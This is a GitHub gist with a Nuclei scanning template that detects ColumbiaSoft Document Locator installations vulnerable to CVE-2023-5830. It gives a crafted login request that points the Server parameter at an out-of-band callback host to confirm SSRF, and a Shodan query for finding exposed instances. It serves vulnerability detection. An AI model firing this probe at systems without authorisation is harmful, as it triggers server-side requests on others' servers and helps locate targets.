Last active
March 19, 2024 16:58
-
-
Save mbb5546/70a9299f2dc3b0d232a16e5e9b8ff223 to your computer and use it in GitHub Desktop.
This repository contains a Nuclei template that can be used to identify instances of ColumbiaSoft's Document Locator that are vulnerable to CVE-2023-5830
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2023-5830 | |
| info: | |
| name: ColumbiaSoft DocumentLocator - Improper Authentication | |
| author: Gonski | |
| severity: critical | |
| description: | | |
| Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login. | |
| impact: | | |
| An attacker could exploit this vulnerability to gain unauthorized access to sensitive information. | |
| remediation: | | |
| Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue. | |
| reference: | |
| - https://nvd.nist.gov/vuln/detail/CVE-2023-5830 | |
| - https://vuldb.com/?ctiid.243729 | |
| - https://github.com/advisories/GHSA-j89v-wm7x-4434 | |
| - https://vuldb.com/?id.243729 | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | |
| cvss-score: 9.8 | |
| cve-id: CVE-2023-5830 | |
| cwe-id: CWE-287 | |
| epss-score: 0.00091 | |
| epss-percentile: 0.37579 | |
| cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:* | |
| metadata: | |
| max-request: 1 | |
| vendor: documentlocator | |
| product: document_locator | |
| shodan-query: 'title:"Document Locator - WebTools"' | |
| tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools | |
| http: | |
| - raw: | |
| - | | |
| @timeout: 20s | |
| POST /api/authentication/login HTTP/1.1 | |
| Host: {{Hostname}} | |
| Content-Type: application/json;charset=UTF-8 | |
| Origin: {{BaseURL}} | |
| Referer: {{BaseURL}} | |
| { | |
| "LoginType":"differentWindows", | |
| "User":"{{randstr}}", | |
| "Password":"{{rand_base(5, "abc")}}", | |
| "Domain":"{{randstr}}", | |
| "Server":"{{interactsh-url}}", | |
| "Repository":"{{randstr}}" | |
| } | |
| matchers-condition: and | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol | |
| words: | |
| - "dns" | |
| - type: word | |
| part: body | |
| words: | |
| - '"Authorized":false' | |
| # digest: 4a0a0047304502201a739a9a323bb1ce5f468a13c31ecc02400b08053b2b81930e86f5decb5d83a2022100b712b21b2b241e8a04f480fe2c2b7cb3e7710265f1332dd9c2996d1a1e0cc3aa:922c64590222798bb761d5b6d8e72950 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment